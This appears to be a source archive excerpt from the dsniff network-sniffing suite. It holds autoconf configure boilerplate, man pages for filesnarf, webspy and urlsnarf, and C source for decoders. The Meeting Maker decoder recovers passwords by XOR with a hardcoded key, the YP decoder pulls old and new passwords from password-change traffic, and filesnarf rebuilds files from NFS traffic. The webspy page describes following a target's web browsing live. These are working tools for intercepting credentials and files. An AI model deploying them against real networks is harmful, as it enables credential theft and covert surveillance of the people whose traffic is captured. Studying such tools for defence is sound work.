values into # config.h.in to produce config.h. # Create a delimiter string that does not exist in confdefs.h, to ease # handling of long lines. ac_delim='%!_!# ' for ac_last_try in false false :; do ac_tt=`sed -n "/$ac_delim/p" confdefs.h` if test -z "$ac_tt"; then break elif $ac_last_try; then as_fn_error $? "could not make $CONFIG_HEADERS" "$LINENO" 5 else ac_delim="$ac_delim!$ac_delim _$ac_delim!! " fi done # For the awk script, D is an array of macro values keyed by name, # likewise P contains macro parameters if any. Preserve backslash # newline sequences. ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* sed -n ' s/.\{148\}/&'"$ac_delim"'/g t rset :rset s/^[ ]*#[ ]*define[ ][ ]*/ / t def d :def s/\\$// t bsnl s/["\\]/\\&/g s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ D["\1"]=" \3"/p s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2"/p d :bsnl s/["\\]/\\&/g s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ D["\1"]=" \3\\\\\\n"\\/p t cont s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2\\\\\\n"\\/p t cont d :cont n s/.\{148\}/&'"$ac_delim"'/g t clear :clear s/\\$// t bsnlc s/["\\]/\\&/g; s/^/"/; s/$/"/p d :bsnlc s/["\\]/\\&/g; s/^/"/; s/$/\\\\\\n"\\/p b cont ' >$CONFIG_STATUS || ac_write_fail=1 cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 for (key in D) D_is_set[key] = 1 FS = "" } /^[\t ]*#[\t ]*(define|undef)[\t ]+$ac_word_re([\t (]|\$)/ { line = \$ 0 split(line, arg, " ") if (arg[1] == "#") { defundef = arg[2] mac1 = arg[3] } else { defundef = substr(arg[1], 2) mac1 = arg[2] } split(mac1, mac2, "(") #) macro = mac2[1] prefix = substr(line, 1, index(line, defundef) - 1) if (D_is_set[macro]) { # Preserve the white space surrounding the "#". print prefix "define", macro P[macro] D[macro] next } else { # Replace #undef with comments. This is necessary, for example, # in the case of _POSIX_SOURCE, which is predefined and required # on some systems where configure will not decide to define it. if (defundef == "undef") { print "/*", prefix defundef, macro, "*/" next } } } { print } _ACAWK _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 as_fn_error $? "could not setup config headers machinery" "$LINENO" 5 fi # test -n "$CONFIG_HEADERS" eval set X " :F $CONFIG_FILES :H $CONFIG_HEADERS " shift for ac_tag do case $ac_tag in :[FHLC]) ac_mode=$ac_tag; continue;; esac case $ac_mode$ac_tag in :[FHL]*:*);; :L* | :C*:*) as_fn_error $? "invalid tag '$ac_tag'" "$LINENO" 5;; :[FH]-) ac_tag=-:-;; :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; esac ac_save_IFS=$IFS IFS=: set x $ac_tag IFS=$ac_save_IFS shift ac_file=$1 shift case $ac_mode in :L) ac_source=$1;; :[FH]) ac_file_inputs= for ac_f do case $ac_f in -) ac_f="$ac_tmp/stdin";; *) # Look for the file first in the build tree, then in the source tree # (if the path is not absolute). The absolute path cannot be DOS-style, # because $ac_f cannot contain ':'. test -f "$ac_f" || case $ac_f in [\\/$]*) false;; *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; esac || as_fn_error 1 "cannot find input file: '$ac_f'" "$LINENO" 5;; esac case $ac_f in *\'*) ac_f=`printf "%s\n" "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac as_fn_append ac_file_inputs " '$ac_f'" done # Let's still pretend it is 'configure' which instantiates (i.e., don't # use $as_me), people would be surprised to read: # /* config.h. Generated by config.status. */ configure_input='Generated from '` printf "%s\n" "$*" | sed 's|^[^:]*/||;s|:[^:]*/|, |g' `' by configure.' if test x"$ac_file" != x-; then configure_input="$ac_file. $configure_input" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: creating $ac_file" >&5 printf "%s\n" "$as_me: creating $ac_file" >&6;} fi # Neutralize special characters interpreted by sed in replacement strings. case $configure_input in #( *\&* | *\|* | *\\* ) ac_sed_conf_input=`printf "%s\n" "$configure_input" | sed 's/[\\\\&|]/\\\\&/g'`;; #( *) ac_sed_conf_input=$configure_input;; esac case $ac_tag in *:-:* | *:-) cat >"$ac_tmp/stdin" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 ;; esac ;; esac ac_dir=`$as_dirname -- "$ac_file" || $as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$ac_file" : 'X\(//\)[^/]' \| \ X"$ac_file" : 'X\(//\)$' \| \ X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X"$ac_file" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` as_dir="$ac_dir"; as_fn_mkdir_p ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_dir_suffix=/`printf "%s\n" "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. ac_top_builddir_sub=`printf "%s\n" "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; esac ;; esac ac_abs_top_builddir=$ac_pwd ac_abs_builddir=$ac_pwd$ac_dir_suffix # for backward compatibility: ac_top_builddir=$ac_top_build_prefix case $srcdir in .) # We are building in place. ac_srcdir=. ac_top_srcdir=$ac_top_builddir_sub ac_abs_top_srcdir=$ac_pwd ;; [\\/]* | ?:[\\/]* ) # Absolute name. ac_srcdir=$srcdir$ac_dir_suffix; ac_top_srcdir=$srcdir ac_abs_top_srcdir=$srcdir ;; *) # Relative name. ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix ac_top_srcdir=$ac_top_build_prefix$srcdir ac_abs_top_srcdir=$ac_pwd/$srcdir ;; esac ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix case $ac_mode in :F) # # CONFIG_FILE # case $INSTALL in [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; *) ac_INSTALL=$ac_top_build_prefix$INSTALL ;; esac _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # If the template does not know about datarootdir, expand it. # FIXME: This hack should be removed a few years after 2.60. ac_datarootdir_hack=; ac_datarootdir_seen= ac_sed_dataroot=' /datarootdir/ { p q } /@datadir@/p /@docdir@/p /@infodir@/p /@localedir@/p /@mandir@/p' case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in *datarootdir*) ac_datarootdir_seen=yes;; *@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 printf "%s\n" "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_datarootdir_hack=' s&@datadir@&$datadir&g s&@docdir@&$docdir&g s&@infodir@&$infodir&g s&@localedir@&$localedir&g s&@mandir@&$mandir&g s&\\\${datarootdir}&$datarootdir&g' ;; esac _ACEOF # Neutralize VPATH when '$srcdir' = '.'. # Shell code in configure.ac might set extrasub. # FIXME: do we really want to maintain this feature? cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_sed_extra="$ac_vpsub $extrasub _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 :t /@[a-zA-Z_][a-zA-Z_0-9]*@/!b s|@configure_input@|$ac_sed_conf_input|;t t s&@top_builddir@&$ac_top_builddir_sub&;t t s&@top_build_prefix@&$ac_top_build_prefix&;t t s&@srcdir@&$ac_srcdir&;t t s&@abs_srcdir@&$ac_abs_srcdir&;t t s&@top_srcdir@&$ac_top_srcdir&;t t s&@abs_top_srcdir@&$ac_abs_top_srcdir&;t t s&@builddir@&$ac_builddir&;t t s&@abs_builddir@&$ac_abs_builddir&;t t s&@abs_top_builddir@&$ac_abs_top_builddir&;t t s&@INSTALL@&$ac_INSTALL&;t t $ac_datarootdir_hack " eval sed \"\$ac_sed_extra\" "$ac_file_inputs" | $AWK -f "$ac_tmp/subs.awk" \ >$ac_tmp/out || as_fn_error $? "could not create $ac_file" "$LINENO" 5 test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } && { ac_out=`sed -n '/^[ ]*datarootdir[ ]*:*=/p' \ "$ac_tmp/out"`; test -z "$ac_out"; } && { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file contains a reference to the variable 'datarootdir' which seems to be undefined. Please make sure it is defined" >&5 printf "%s\n" "$as_me: WARNING: $ac_file contains a reference to the variable 'datarootdir' which seems to be undefined. Please make sure it is defined" >&2;} rm -f "$ac_tmp/stdin" case $ac_file in -) cat "$ac_tmp/out" && rm -f "$ac_tmp/out";; *) rm -f "$ac_file" && mv "$ac_tmp/out" "$ac_file";; esac \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 ;; :H) # # CONFIG_HEADER # if test x"$ac_file" != x-; then { printf "%s\n" "/* $configure_input */" >&1 \ && eval '$AWK -f "$ac_tmp/defines.awk"' "$ac_file_inputs" } >"$ac_tmp/config.h" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 if diff "$ac_file" "$ac_tmp/config.h" >/dev/null 2>&1; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: $ac_file is unchanged" >&5 printf "%s\n" "$as_me: $ac_file is unchanged" >&6;} else rm -f "$ac_file" mv "$ac_tmp/config.h" "$ac_file" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 fi else printf "%s\n" "/* $configure_input */" >&1 \ && eval '$AWK -f "$ac_tmp/defines.awk"' "$ac_file_inputs" \ || as_fn_error $? "could not create -" "$LINENO" 5 fi ;; esac done # for ac_tag as_fn_exit 0 _ACEOF ac_clean_files=$ac_clean_files_save test $ac_write_fail = 0 || as_fn_error $? "write failure creating $CONFIG_STATUS" "$LINENO" 5 # configure is writing to config.log, and then calls config.status. # config.status does its own redirection, appending to config.log. # Unfortunately, on DOS this fails, as config.log is still kept open # by configure, so config.status won't be able to write to it; its # output is simply discarded. So we exec the FD to /dev/null, # effectively closing config.log, so it can be properly (re)opened and # appended to by config.status. When coming back to configure, we # need to make the FD available again. if test "$no_create" != yes; then ac_cs_success=: ac_config_status_args= test "$silent" = yes && ac_config_status_args="$ac_config_status_args --quiet" exec 5>/dev/null $SHELL $CONFIG_STATUS $ac_config_status_args || ac_cs_success=false exec 5>>config.log # Use ||, not &&, to avoid exiting from the if with $? = 1, which # would make configure fail if this is the last instruction. $ac_cs_success || as_fn_exit 1 fi if test -n "$ac_unrecognized_opts" && test "$enable_option_checking" != no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: unrecognized options: $ac_unrecognized_opts" >&5 printf "%s\n" "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;} fi hackerschoice-dsniff-a17510d/filesnarf.80000664000175000017500000000147215105626144020060 0ustar epsilonepsilon.TH FILESNARF 8 .ad .fi .SH NAME filesnarf \- sniff files from NFS traffic .SH SYNOPSIS .na .nf .fi \fBfilesnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBfilesnarf\fR saves files sniffed from NFS traffic in the current working directory. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching files. .IP \fIpattern\fR Specify regular expression for filename matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), nfsd(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/decode_mmxp.c0000664000175000017500000000367315105626144020453 0ustar epsilonepsilon/* * decode_mmxp.c * * Meeting Maker. * * Thanks for Matt Power for his BUGTRAQ post * on Meeting Maker encryption, and for providing me with traffic traces. * * The encryption algorithm seems to be much simpler than what Matt * reversed - see below... * * Copyright (c) 2000 Dug Song * * $Id: decode_mmxp.c,v 1.8 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "buf.h" #include "decode.h" #define MM_SECRET "Thisisastupidwasteoftimeandspace" static u_char *mm_xor = MM_SECRET; int decode_mmxp(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_char *p, c; u_int32_t i; int encrypt; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, len); while ((i = buf_index(&inbuf, "\x00\x00\x24\x55", 4)) != -1) { buf_skip(&inbuf, i + 4); if (buf_cmp(&inbuf, "\x7f\xff", 2) == 0) encrypt = 1; else if (buf_cmp(&inbuf, "\xff\xff", 2) == 0) encrypt = 0; else continue; buf_skip(&inbuf, 4); /* LPPPg? */ if (buf_get(&inbuf, &i, sizeof(i)) < 0) break; i = ntohl(i); if (buf_skip(&inbuf, i + 4 + 4) < 0) continue; /* Server. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; buf_put(&outbuf, buf_ptr(&inbuf), c); buf_put(&outbuf, "\n", 1); buf_skip(&inbuf, c + 4); /* Username. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; buf_put(&outbuf, buf_ptr(&inbuf), c); buf_put(&outbuf, "\n", 1); buf_skip(&inbuf, c + 4); /* Password. */ if (buf_get(&inbuf, &c, 1) != 1) break; if (buf_len(&inbuf) < c) break; p = buf_ptr(&inbuf); if (encrypt) { for (i = 0; i < c; i++) p[i] ^= mm_xor[i % (sizeof(MM_SECRET) - 1)]; } buf_put(&outbuf, p, c); buf_put(&outbuf, "\n", 1); } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/decode_yp.c0000664000175000017500000000625015105626144020114 0ustar epsilonepsilon/* * decode_yp.c * * RPC "Yellow Pee". * * Totally untested, i don't run YP. Let me know if this works. :-) * * Copyright (c) 2000 Dug Song * * $Id: decode_yp.c,v 1.6 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "rpc.h" #include "decode.h" /* XXX - varies on different systems :-( */ struct my_passwd { char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct my_yppasswd { char *oldpass; struct my_passwd newpw; }; static bool_t xdr_my_passwd(XDR *xdrs, struct my_passwd *objp) { if (xdr_string(xdrs, &objp->pw_name, ~0) && xdr_string(xdrs, &objp->pw_passwd, ~0) && xdr_int(xdrs, &objp->pw_uid) && xdr_int(xdrs, &objp->pw_gid) && xdr_string(xdrs, &objp->pw_gecos, ~0) && xdr_string(xdrs, &objp->pw_dir, ~0) && xdr_string(xdrs, &objp->pw_shell, ~0)) return (TRUE); return (FALSE); } static bool_t xdr_my_yppasswd(XDR *xdrs, struct my_yppasswd *objp) { if (xdr_string(xdrs, &objp->oldpass, ~0) && xdr_my_passwd(xdrs, &objp->newpw)) return (TRUE); return (FALSE); } int decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen) { struct rpc_msg msg; struct my_yppasswd yp; XDR xdrs; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); obuf[0] = '\0'; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == YPPASSWDPROG && msg.rm_call.cb_proc == YPPASSWDPROC_UPDATE) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); memset(&yp, 0, sizeof(yp)); if (xdr_my_yppasswd(&xdrs, &yp)) { snprintf(obuf, olen, "%s\n%s:%s:%d:%d:%s:%s:%s\n", yp.oldpass, yp.newpw.pw_name, yp.newpw.pw_passwd, yp.newpw.pw_uid, yp.newpw.pw_gid, yp.newpw.pw_gecos, yp.newpw.pw_dir, yp.newpw.pw_shell); } xdr_destroy(&xdrs); } return (strlen(obuf)); } int decode_ypserv(u_char *buf, int len, u_char *obuf, int olen) { struct rpc_msg msg; struct xid_map *xm; char *domain; bool_t status; XDR xdrs; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); obuf[0] = '\0'; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == YPPROG && msg.rm_call.cb_proc == YPPROC_DOMAIN) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); domain = NULL; if (xdr_string(&xdrs, &domain, YPMAXDOMAIN)) { if ((domain = strdup(domain)) != NULL) xid_map_enter(msg.rm_xid, YPPROG, YPVERS, YPPROC_DOMAIN, (void *) domain); } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_bool(&xdrs, &status)) { if (status == TRUE) snprintf(obuf, olen, "%s\n", (char *)xm->data); } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } return (strlen(obuf)); } hackerschoice-dsniff-a17510d/webspy.80000664000175000017500000000136615105626144017422 0ustar epsilonepsilon.TH WEBSPY 8 .ad .fi .SH NAME webspy \- display sniffed URLs in Netscape in real-time .SH SYNOPSIS .na .nf .fi \fBwebspy\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] \fIhost\fR .SH DESCRIPTION .ad .fi \fBwebspy\fR sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). Netscape must be running on your local X display ahead of time. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP \fIhost\fR Specify the web client to spy on. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/filesnarf.c0000664000175000017500000002426315105626144020136 0ustar epsilonepsilon/* * filesnarf.c * * Sniff files from NFS traffic. * * Copyright (c) 2000 Dug Song * * $Id: filesnarf.c,v 1.13 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include "decode.h" #include "pcaputil.h" #include "nfs_prot.h" #include "rpc.h" struct myreadargs { char *filename; u_int offset; }; struct fh_map { u_char fh[NFS3_FHSIZE]; char *filename; }; #define FH_MAP_SIZE 128 struct fh_map fh_maps[FH_MAP_SIZE]; int fh_map_next = 0; int fh_map_hint = 0; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]\n"); exit(1); } static void fh_map_init(void) { memset(&fh_maps, 0, sizeof(fh_maps)); } static void fh_map_add(char *filename, u_char *fh, int len) { struct fh_map *fm; fm = &fh_maps[fh_map_next]; if (++fh_map_next > FH_MAP_SIZE) fh_map_next = 0; memcpy(fm->fh, fh, len); if ((fm->filename = strdup(filename)) == NULL) err(1, "fh_map_add: malloc"); } static char * fh_map_find(u_char *fh, int len) { struct fh_map *fm; int i; i = fh_map_hint; do { fm = &fh_maps[i]; if (memcmp(fm->fh, fh, len) == 0) { fh_map_hint = i; return (fm->filename); } if (++i > FH_MAP_SIZE) i = 0; } while (i != fh_map_hint); return (NULL); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static void nfs_save(struct tuple4 *addr, struct myreadargs *ma, u_char *buf, int len) { int fd; warnx("%s.%d > %s.%d: %s (%d@%d)", libnet_addr2name4(addr->daddr, LIBNET_DONT_RESOLVE), addr->dest, libnet_addr2name4(addr->saddr, LIBNET_DONT_RESOLVE), addr->source, ma->filename, len, ma->offset); if ((fd = open(ma->filename, O_WRONLY|O_CREAT, 0644)) >= 0) { if (lseek(fd, ma->offset, SEEK_SET) == ma->offset) write(fd, buf, len); } close(fd); } static void nfs2_call(u_int32_t xid, u_int32_t proc, u_char *buf, int len) { XDR xdrs; struct diropargs dargs; struct readargs rargs; struct myreadargs *ma; char *fname; switch (proc) { case NFSPROC_LOOKUP: memset(&dargs, 0, sizeof(dargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_diropargs(&xdrs, &dargs)) { if (regex_match(dargs.name)) { xid_map_enter(xid, NFS_PROGRAM, NFS_VERSION, proc, (void *)dargs.name); } } xdr_destroy(&xdrs); break; case NFSPROC_READ: memset(&rargs, 0, sizeof(rargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_readargs(&xdrs, &rargs)) { fname = fh_map_find(rargs.file.data, NFS_FHSIZE); if (fname != NULL) { ma = (struct myreadargs *) malloc(sizeof(*ma)); if (ma != NULL) { ma->filename = fname; ma->offset = rargs.offset; xid_map_enter(xid, NFS_PROGRAM, NFS_VERSION, NFSPROC_READ, (void *)ma); } } } xdr_destroy(&xdrs); break; } } static void nfs2_reply(struct xid_map *xm, struct tuple4 *addr, u_char *buf, int len) { XDR xdrs; struct diropres dres; struct readres rres; switch (xm->proc) { case NFSPROC_LOOKUP: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&dres, 0, sizeof(dres)); if (xdr_diropres(&xdrs, &dres)) { if (dres.status == NFS_OK) fh_map_add((char *)xm->data, dres.diropres_u.diropres.file.data, NFS_FHSIZE); } xdr_destroy(&xdrs); break; case NFSPROC_READ: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&rres, 0, sizeof(rres)); if (xdr_readres(&xdrs, &rres)) { if (rres.status == NFS_OK) { nfs_save(addr, (struct myreadargs *)xm->data, rres.readres_u.reply.data.data_val, rres.readres_u.reply.data.data_len); } } xdr_destroy(&xdrs); break; } } static void nfs3_call(u_int32_t xid, u_int32_t proc, u_char *buf, int len) { XDR xdrs; struct LOOKUP3args largs; struct READ3args rargs; struct myreadargs *ma; char *fname; switch (proc) { case NFSPROC3_LOOKUP: memset(&largs, 0, sizeof(largs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_LOOKUP3args(&xdrs, &largs)) { if (regex_match(largs.what.name)) { xid_map_enter(xid, NFS_PROGRAM, NFS_V3, proc, (void *)largs.what.name); } } xdr_destroy(&xdrs); break; case NFSPROC3_READ: memset(&rargs, 0, sizeof(rargs)); xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (xdr_READ3args(&xdrs, &rargs)) { fname = fh_map_find(rargs.file.data.data_val, rargs.file.data.data_len); if (fname != NULL) { ma = (struct myreadargs *) malloc(sizeof(*ma)); if (ma != NULL) { ma->filename = fname; ma->offset = rargs.offset; xid_map_enter(xid, NFS_PROGRAM, NFS_V3, NFSPROC_READ, (void *)ma); } } } xdr_destroy(&xdrs); break; } } static void nfs3_reply(struct xid_map *xm, struct tuple4 *addr, u_char *buf, int len) { XDR xdrs; struct LOOKUP3res lres; struct READ3res rres; switch (xm->proc) { case NFSPROC3_LOOKUP: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&lres, 0, sizeof(lres)); if (xdr_LOOKUP3res(&xdrs, &lres)) { if (lres.status == NFS3_OK) { fh_map_add((char *)xm->data, lres.LOOKUP3res_u.resok.object.data.data_val, lres.LOOKUP3res_u.resok.object.data.data_len); } } xdr_destroy(&xdrs); break; case NFSPROC3_READ: xdrmem_create(&xdrs, buf, len, XDR_DECODE); memset(&rres, 0, sizeof(rres)); if (xdr_READ3res(&xdrs, &rres)) { if (rres.status == NFS3_OK) { nfs_save(addr, (struct myreadargs *)xm->data, rres.READ3res_u.resok.data.data_val, rres.READ3res_u.resok.data.data_len); } } xdr_destroy(&xdrs); break; } } static void decode_nfs(struct tuple4 *addr, u_char *buf, int len) { struct rpc_msg msg; struct xid_map *xm; int hdrlen; memset(&msg, 0, sizeof(msg)); if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return; buf += hdrlen; len -= hdrlen; if (msg.rm_direction == CALL && msg.rm_call.cb_prog == NFS_PROGRAM) { if (msg.rm_call.cb_vers == NFS_VERSION) nfs2_call(msg.rm_xid, msg.rm_call.cb_proc, buf, len); else if (msg.rm_call.cb_vers == NFS_V3) nfs3_call(msg.rm_xid, msg.rm_call.cb_proc, buf, len); } else if ((xm = xid_map_find(msg.rm_xid)) != NULL && msg.rm_direction == REPLY && msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { if (xm->vers == NFS_VERSION) nfs2_reply(xm, addr, buf, len); else if (xm->vers == NFS_V3) nfs3_reply(xm, addr, buf, len); free(xm->data); memset(xm, 0, sizeof(*xm)); } } static void decode_udp_nfs(struct libnet_ipv4_hdr *ip) { static struct tuple4 addr; struct libnet_udp_hdr *udp; u_char *buf; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_UDP || len < sizeof(*udp)) return; buf = (u_char *)ip + ip_hl; udp = (struct libnet_udp_hdr *)buf; if (ntohs(udp->uh_sport) != 2049 && ntohs(udp->uh_dport) != 2049) return; if (len != ntohs(udp->uh_ulen)) return; buf += sizeof(*udp); len -= sizeof(*udp); addr.saddr = ip->ip_dst.s_addr; addr.daddr = ip->ip_src.s_addr; addr.source = ntohs(udp->uh_dport); addr.dest = ntohs(udp->uh_sport); decode_nfs(&addr, buf, len); } static int decode_tcp_nfs_half(struct tuple4 *addr, struct half_stream *hs) { u_char *p, *buf; int i, len, discard; u_int32_t fraghdr; buf = hs->data; len = hs->count - hs->offset; discard = 0; for (p = buf; p + 4 < buf + len; ) { fraghdr = pntohl(p); p += 4 + FRAGLEN(fraghdr); if (p > buf + len) return (0); if (LASTFRAG(fraghdr)) { i = p - buf; decode_nfs(addr, buf, i); buf += i; len -= i; discard += i; } } return (discard); } static void decode_tcp_nfs(struct tcp_stream *ts, void **darth) { int len = 0; if (ts->addr.dest != 2049 && ts->addr.source != 2049) return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; break; case NIDS_DATA: if (ts->server.count_new > 0) { len = decode_tcp_nfs_half(&ts->addr, &ts->server); } else if (ts->client.count_new > 0) { len = decode_tcp_nfs_half(&ts->addr, &ts->client); } nids_discard(ts, len); break; default: if (ts->server.count > 0) { decode_tcp_nfs_half(&ts->addr, &ts->server); } else if (ts->client.count > 0) { decode_tcp_nfs_half(&ts->addr, &ts->client); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:p:vh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; fh_map_init(); if (!nids_init()) errx(1, "nids_init: %s", nids_errbuf); nids_register_ip(decode_udp_nfs); nids_register_tcp(decode_tcp_nfs); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } nids_run(); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/urlsnarf.80000664000175000017500000000205315105626144017737 0ustar epsilonepsilon.TH URLSNARF 8 .ad .fi .SH NAME urlsnarf \- sniff HTTP requests in Common Log Format .SH SYNOPSIS .na .nf .fi \fBurlsnarf\fR [\fB-n\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBurlsnarf\fR outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.). .SH OPTIONS .IP \fB-n\fR Do not resolve IP addresses to hostnames. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-p \fIpcapfile\fR" Process packets from the specified PCAP capture file instead of the network. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching URLs. Specify the interface to listen on. .IP \fIpattern\fR Specify regular expression for URL matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/missing/0000775000175000017500000000000015105626144017463 5ustar epsilonepsilonhackerschoice-dsniff-a17510d/missing/dummy.c0000664000175000017500000000000015105626144020750 0ustar 